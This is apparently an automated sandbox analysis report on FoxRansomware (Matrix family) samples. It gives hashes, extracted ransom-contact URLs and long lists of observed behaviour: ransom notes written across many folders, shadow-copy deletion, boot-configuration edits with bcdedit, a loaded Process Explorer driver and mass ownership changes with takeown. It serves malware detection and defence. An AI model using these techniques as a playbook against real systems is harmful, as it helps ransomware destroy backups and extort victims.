Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
144s -
max time network
137s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
03-04-2024 17:56
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20240221-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20240221-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20240221-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20240319-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20240226-en
General
-
Target
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
-
Size
1.2MB
-
MD5
268360527625d09e747d9f7ab1f84da5
-
SHA1
09772eb89c9743d3a6d7b2709c76e9740aa4c4b1
-
SHA256
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620
-
SHA512
07fba0c06040fe4ef5f812a52d639bdea6cbe5bf7ff4560403ad12955e6b1ff2b4615361ac4533696a6c5e12d36fb2d2e0df3da2927f6b45f154f0a4e83315e1
-
SSDEEP
24576:mLeb4QFvTn5TuJR5ezGPMy4EnBB/CPVd+5M89H:Xb/GMO6d+5M+H
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#FOX_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File created C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Solitaire\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Adobe\Color\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Chess\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Solitaire\it-IT\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ar\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Antarctica\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\de-DE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\storage\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Mozilla Firefox\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\gu\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\OfficeSoftwareProtectionPlatform\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Mozilla Maintenance Service\logs\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\Desktop\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\gdoevwuq.default-release\safebrowsing\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\lua\sd\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.rcp.feature_1.2.0.v20140523-0116\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\SpiderSolitaire\en-US\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\es-ES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\security\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Media Player\Sync Playlists\en-US\000088CE\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Purble Place\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\bs\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-330940541-141609230-1670313778-1000\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\gdoevwuq.default-release\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Backgammon\en-US\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Public\Documents\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\cmm\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jre7\lib\zi\Atlantic\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\mn\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\tet\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\include\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files (x86)\Google\Update\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\es\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Microsoft Games\Hearts\ja-JP\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Users\Admin\AppData\Local\Microsoft\Feeds\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\locale\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File created C:\Program Files\VideoLAN\VLC\locale\gl\LC_MESSAGES\#FOX_README#.rtf 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 2016 bcdedit.exe 5076 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 9 1808 powershell.exe -
Drops file in Drivers directory 1 IoCs
Processes:
Gi44eNKg64.exedescription ioc process File created C:\Windows\system32\Drivers\PROCEXP152.SYS Gi44eNKg64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
Gi44eNKg64.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" Gi44eNKg64.exe -
Executes dropped EXE 64 IoCs
Processes:
NWmz9gZP.exeGi44eNKg.exeGi44eNKg64.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exeGi44eNKg.exepid process 2504 NWmz9gZP.exe 2592 Gi44eNKg.exe 572 Gi44eNKg64.exe 2824 Gi44eNKg.exe 4432 Gi44eNKg.exe 3216 Gi44eNKg.exe 3456 Gi44eNKg.exe 4004 Gi44eNKg.exe 2296 Gi44eNKg.exe 4228 Gi44eNKg.exe 1484 Gi44eNKg.exe 3824 Gi44eNKg.exe 3616 Gi44eNKg.exe 5044 Gi44eNKg.exe 3296 Gi44eNKg.exe 2016 Gi44eNKg.exe 4872 Gi44eNKg.exe 3216 Gi44eNKg.exe 3280 Gi44eNKg.exe 3548 Gi44eNKg.exe 2452 Gi44eNKg.exe 1944 Gi44eNKg.exe 816 Gi44eNKg.exe 2152 Gi44eNKg.exe 4584 Gi44eNKg.exe 2516 Gi44eNKg.exe 3892 Gi44eNKg.exe 800 Gi44eNKg.exe 2320 Gi44eNKg.exe 2332 Gi44eNKg.exe 1072 Gi44eNKg.exe 2580 Gi44eNKg.exe 2136 Gi44eNKg.exe 2008 Gi44eNKg.exe 4304 Gi44eNKg.exe 2508 Gi44eNKg.exe 4776 Gi44eNKg.exe 1432 Gi44eNKg.exe 2804 Gi44eNKg.exe 2896 Gi44eNKg.exe 4824 Gi44eNKg.exe 2632 Gi44eNKg.exe 4036 Gi44eNKg.exe 4116 Gi44eNKg.exe 4796 Gi44eNKg.exe 568 Gi44eNKg.exe 4288 Gi44eNKg.exe 4232 Gi44eNKg.exe 4244 Gi44eNKg.exe 4044 Gi44eNKg.exe 4340 Gi44eNKg.exe 4152 Gi44eNKg.exe 2696 Gi44eNKg.exe 4912 Gi44eNKg.exe 4856 Gi44eNKg.exe 3712 Gi44eNKg.exe 4700 Gi44eNKg.exe 3744 Gi44eNKg.exe 2032 Gi44eNKg.exe 3988 Gi44eNKg.exe 4812 Gi44eNKg.exe 2820 Gi44eNKg.exe 3688 Gi44eNKg.exe 4368 Gi44eNKg.exe -
Loads dropped DLL 64 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.execmd.exeGi44eNKg.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exepid process 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 2456 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe 2228 cmd.exe 2592 Gi44eNKg.exe 3008 cmd.exe 3052 cmd.exe 3200 cmd.exe 2004 cmd.exe 2468 cmd.exe 4964 cmd.exe 4144 cmd.exe 4780 cmd.exe 3832 cmd.exe 636 cmd.exe 3720 cmd.exe 888 cmd.exe 2880 cmd.exe 3988 cmd.exe 3952 cmd.exe 3184 cmd.exe 3536 cmd.exe 3364 cmd.exe 3768 cmd.exe 3596 cmd.exe 2996 cmd.exe 2040 cmd.exe 3084 cmd.exe 4660 cmd.exe 4632 cmd.exe 1488 cmd.exe 2668 cmd.exe 4088 cmd.exe 2584 cmd.exe 984 cmd.exe 4080 cmd.exe 2472 cmd.exe 4440 cmd.exe 4048 cmd.exe 4528 cmd.exe 4604 cmd.exe 2184 cmd.exe 4732 cmd.exe 4128 cmd.exe 1548 cmd.exe 4132 cmd.exe 4800 cmd.exe 4760 cmd.exe 1444 cmd.exe 4316 cmd.exe 4172 cmd.exe 1772 cmd.exe 3708 cmd.exe 1812 cmd.exe 4428 cmd.exe 4996 cmd.exe 1592 cmd.exe 2880 cmd.exe 4968 cmd.exe 3248 cmd.exe 4488 cmd.exe 3884 cmd.exe 4420 cmd.exe 3700 cmd.exe 3256 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
Processes:
takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exepid process 3220 takeown.exe 3732 takeown.exe 1252 3836 takeown.exe 1288 takeown.exe 1656 takeown.exe 1260 takeown.exe 4568 takeown.exe 4364 takeown.exe 2484 takeown.exe 696 takeown.exe 4520 takeown.exe 3516 takeown.exe 4940 takeown.exe 4052 takeown.exe 2032 takeown.exe 4232 2384 takeown.exe 1700 takeown.exe 2436 takeown.exe 1200 takeown.exe 3136 takeown.exe 3872 takeown.exe 3512 takeown.exe 3640 takeown.exe 2752 takeown.exe 4456 takeown.exe 3160 takeown.exe 1332 takeown.exe 3432 takeown.exe 2440 takeown.exe 1736 3752 852 takeown.exe 488 takeown.exe 1880 takeown.exe 3252 takeown.exe 4988 takeown.exe 2444 takeown.exe 1572 takeown.exe 2244 takeown.exe 4684 takeown.exe 2212 takeown.exe 564 takeown.exe 2188 3412 takeown.exe 4812 takeown.exe 3664 takeown.exe 3832 takeown.exe 4236 takeown.exe 4780 takeown.exe 2360 takeown.exe 3484 takeown.exe 4164 takeown.exe 3748 takeown.exe 4576 3968 takeown.exe 4284 takeown.exe 2512 takeown.exe 4440 takeown.exe 3272 takeown.exe 4060 takeown.exe 4392 takeown.exe 4104 -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\FoxRansomware\Gi44eNKg.exe upx behavioral5/memory/2592-3574-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3008-4322-0x0000000000160000-0x00000000001D7000-memory.dmp upx behavioral5/memory/2824-4324-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4432-4328-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3216-4527-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3456-4693-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4004-4817-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2296-4834-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4228-5054-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1484-5057-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3824-5335-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3616-5475-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5044-6136-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/5044-6135-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3296-6233-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2016-6625-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4872-6823-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3216-7689-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3280-7698-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3280-7697-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3548-7703-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2452-7706-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1944-7840-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/816-7843-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2152-7854-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4584-7858-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2516-7866-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3892-7871-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/800-7881-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/800-7880-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2320-7883-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2332-7889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1072-7890-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2580-7893-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2136-7895-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2008-7903-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4304-7908-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2508-7911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4776-7914-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/1432-7916-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2804-7919-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2896-7924-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4824-7925-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2632-7928-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4036-7931-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4116-7935-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4796-7936-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/568-7941-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4288-7942-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4232-7948-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4244-7949-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4044-7956-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4340-7957-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4152-7959-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2696-7960-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4912-7965-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4856-7967-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3712-7972-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/4700-7976-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3744-7978-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3744-7979-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/2032-7980-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral5/memory/3988-7989-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
Processes:
42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exedescription ioc process File opened for modification C:\Program Files (x86)\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Users\Public\Videos\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini 42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe File opened for modification 